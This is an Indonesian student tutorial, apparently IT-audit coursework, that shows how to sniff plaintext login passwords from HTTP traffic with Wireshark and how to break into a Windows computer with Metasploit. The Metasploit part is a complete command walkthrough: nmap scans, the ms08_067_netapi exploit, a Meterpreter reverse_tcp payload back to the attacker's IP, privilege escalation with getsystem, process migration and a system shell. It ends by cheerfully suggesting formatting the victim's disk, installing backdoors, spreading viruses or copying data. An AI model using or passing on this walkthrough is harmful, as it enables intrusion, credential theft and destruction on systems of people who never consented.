Dokumen tersebut memberikan panduan cara melacak password jaringan menggunakan Wireshark dan melakukan penetrasi sistem operasi Windows menggunakan Metasploit. Langkah-langkahnya meliputi instalasi Wireshark dan Metasploit, menangkap paket jaringan untuk melihat password, serta mengeksploitasi kerentanan Windows menggunakan Metasploit untuk mendapatkan akses sistem korban.
2. WIRESHARK
1. Melacak password pada jaringan menggunakan Wireshark
Sebelum kita menggunakan tools tesebut ada baiknya kita terlebih dahulu mengetahui
kegunaan dari tools yang akan kita gunakan.
Wireshark itu apa ya??? Newbe ckckckkck
Wireshark merupakan salah satu dari sekian banyak tool Network Analyzer yang banyak
digunakan oleh Network administrator untuk menganalisa kinerja jaringannya terrmasuk
protokol didalamnya. Wireshark banyak disukai karena interfacenya yang menggunakan
Graphical User Interface (GUI) atau tampilan grafis.
Wireshark mampu menangkap paket-paket data atau informasi yang berterbangan dalam
jaringan. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan
mudah ditangkap dan dianalisa. Karenanya tak jarang tool ini juga dapat dipakai untuk
Sniffing (memperoleh informasi penting seperti password email atau account lain) dengan
menangkap paket-paket yang berterbangan di dalam jaringan dan menganalisanya.
Setelah kita mengetahui fungsi dari software yang akan kita gunakan, kali ini kita
akan mencoba salah satu dari fungsi Wireshark yaitu Sniffing.
Bagaimana caranya.....???? yuk ikuti langkah berikut ini..
a. Pertama-tama kita harus menginstal terlebih dahulu program Wireshark pada
computer/Laptop yang akan kita gunakan, untuk Software Wireshark nya dapat di
download di sini http://www.wireshark.org/
b. Setelah di download, langsung saja instal program Wireshark-nya. Gak susah kok
nginstallnya tinggal next-next aja.....
c. Jika proses penginstalan berhasil dengan mulus kurang lebih tampilan programnya seperti
2
Gambar 1 : Loading configuration files wireshark
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
3. Gambar 2 : Tampilan awal Wireshark
d. Selanjutnya, seperti rencana awal kita tadi, kita akan melakukan Sniffing pada
suatu jaringan wireless, so ikuti langkah selanjunya.
e. Pilih Interface List seerti gambar dibawah ini
3
Gambar 3 : Interface List
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
4. f. Setelah kita memilih Interface List, maka akan tampil seperti gambar berikut :
Gambar 4 : Wireshark Capture interface
pada gambar diatas merupakan pilihan koneksi jaringan yang akan kita gunakan, pada
tutorial ini saya memilih jaringan Wireless seperti gambar diatas,
g. Setelah kita jalankan maka secara otomatis Wireshark akan mendeteksi paket-paket
data dan seluruh aktivitas yang berlangsung pada koneksi wireless yang telah kita
pilih seperti gambar berikut :
Gambar 5 : Capturing from Wireshark Network Connection
Ketikkan http seperti gambar diatas tanpa tanda petik, lalu tekan tobol enter.
Tunggu beberapa saat, sampai proses scan wireshark hanya menampilakan akses
HTTP yang sedang berlangsung. Bingung???? Hahhahah biar sama-sama ngerti mari
kita langsung jalankan skenarionya...!
Begini, pertama-tama saya akan membuka dan login pada halaman berikut ini :
http://mahasiswa.atmaluhur.ac.id/index.php
4
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
5. Gambar 6 : Halaman Login Mahasiswa STMIK Atmaluhur
Secara otomatis halaman yang saya buka pasti akan tercantum pada list histori akses
seperti yang tertunjuk pada tanda panah merah dibawah ini :
Gambar 7 : Capturing from Wireshark Network Connection
5
Artinya, ketika kita membuka alamat http://mahasiswa.atmaluhur.ac.id/index.php
maka alamat tersebut, akan terekam sebagai log aktivitas yang berlangsung pada
jaringan tersebut,
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
6. h. Selanjutnya klik kanan pada pilihan yang tertunujuk pada panah merah seperti gambar
diatas, kemudian pilih Follow TCP Stream. Maka akan tampil seperti gambar berikut :
i.
Gambar 8 : Follow TCP Stream
Perhatikan kotak hijau yang terdapat pada gambar diatas merupakan NIM serta
PASSWORD login saya pada halaman website mahasiswa.atmaluhur.ac.id
6
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
7. Metasploit
2. Exploit Windows With Metasploit Backtrack
Setelah kita menggunakan Wireshark, kali ini kita akan mencoba tools selanjutnya yaitu
Metasploit.
Apa itu Metasploit???
Metasploit framework adalah sebuah penetration tool yang cukup powerfull untuk
melakukan penestrasi kedalam sebuah system. metasploit framework bisa juga di katakan
sebagai sebuah platform pengembangan untuk membuat tool security dan exploit.
Metasploit framework sering dibuat dengan menggunakan bahasa pemrograman Ruby.
Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan
penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang
dituju. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya
walaupun penyusup sistem berada padajarakjangkauan yang jauh tetapi dapat
mengendalikan komputer korban.
Oke langsung saja ke sekenario yang akan kita laksanakan adalah kita akan mencoba
untuk penetrasi ke dalam computer target yang telah kita tentukan dengan menggunakan
Metasploit. Langsung saja ikuti langkah berikut ini :
a. Saya asumsikan bahwa dikomputer atau laptop yang anda gunakan saat ini telah
terinstal software Backtrack, selanjutnya lakukan scan IP dan Port yang terbuka pada
jaringan menggunakan nmap yang telah tersedia di backtrack.
buka terminal ketik perintah nmap -sn 192.168.0.1-255
-sn adalah perintah nmap untuk melakukan scanning IP yang aktif / tidak..
-192.168.0.1-255 adalah IP yang akan kita scan, dari 192.168.0.1 sampai
192.168.0.255
Note : Untuk IP nya dapat disesuaikan dengan IP yang anda gunakan
b. Lalu jika sudah menemukan IP yang aktif kita scan Port yang terbuka pada
target..contoh saya mendapakan IP 192.168.0.4 lakukan perintah nmap -f 192.168.0.4
Note :
-f adalah fast scanning sehingga nmap akan melakukan scanning secepat mungkin
lihat hasilnya
7
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
8. Jelas terlihat port 445 terbuka , langsung saja buka msfconsole atau Metasploit Framework
versi console..
c. ketik perintah msfconsole pada terminal/console.
tunggu biasanya agak lama.
setelah terbuka ketik search netapi dan setelah itu kita gunakan yang
exploit/windows/smb/ms08_067_netapi
ketik perintah use exploit/windows/smb/ms08_067_netapi
ketik show options untuk melihat opsi apa yang harus kita isi.
8
d. Langkah selanjutnya kita harus mensetting RHOST terlebih dahulu dengan cara
ketik RHOST dengan ip target lakukan perintah set RHOST 192.168.0.4
Note : IP address menyesuaikan dengan IP Target kita
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
9. set LHOST 192.168.0.3 ( 192.168.0.3 adalah ip saya )
set LPORT 4444 ( port pada Backtrack )
set PAYLOAD windows/meterpreter/reverse_tcp
jalankan exploit dengan perintah exploit
tampak hasilnya seperti berikut ini :
Sejauh ini kita sudah bias masuk di bagian Meterpreter. Yeee Horeeee
Sekarang kita akan mengendalikan Command Prompt ( CMD ) korban , tapi sebelumnya kita
lihat dulu posisi kita...
e. pertama kita lihat siapa kita, dengan perintah getuid, dan outputnya NT
AUTHORITYSYSTEM , tapi bagaimana jika bukan NT AUTHORITYSYSTEM alias si
korban tidak menjalankan sebagai administrator pada komputernya? kita lakukan ketik
perintah getsystem , lalu cek lagi dengan perintah getuid jika sudah NT
AUTHORITYSYSTEM lanjutkan...
kita ketik perintah pwd untuk cek keberadaan kita dan pada output saya
adalah C:WINDOWSsystem32 langsung ketik perintah shell untuk eksekusi CMD..dan
hasilnya tampak seperti gambar berikut :
9
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
10. tapi bagaimana jika ternyata error? tidak seperti di atas saat,error memasukan perintah shell...atau saat
memasukan perintah shell tidak ke C:Windowssystem32 ???
mungkin procces dirrectory nya tidak tepat...
jika masalah seperti itu lakukan perintah migrate...kita akan berpindah..
ketik perintah ps pada meterpreter untuk melihat process ID yang ada...
setelah keluar kita cari PID svchost.exe, jika sudah ketemu pindahlah dengan perintah migrate
contoh : migrate 1328
jika sukses, cek dengan perintah pwd , lalu jalankan perintah shell..
Seperti gambar berikut :
10
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG
11. jika sudah berada di C:Windowssystem32> berarti kita sudah sukses menyusup ke computer Target
yang kita tentukan tinggal selanjutnya bagaimana yang ingin kita lakukan terhadap computer korban,
mau Format Harddisk korban,shutdown,pasang backdoor,sebarin virus,copy data apalah terserah mau
Remmote Desktop. Yah kita yang kendalikan. Tergantung Hati Nurani masing-masing. Hehheheh
11
Dompak King Simbolon_1111500109 | IT AUDIT_STMIK ATMALUHUR PANGKALPINANG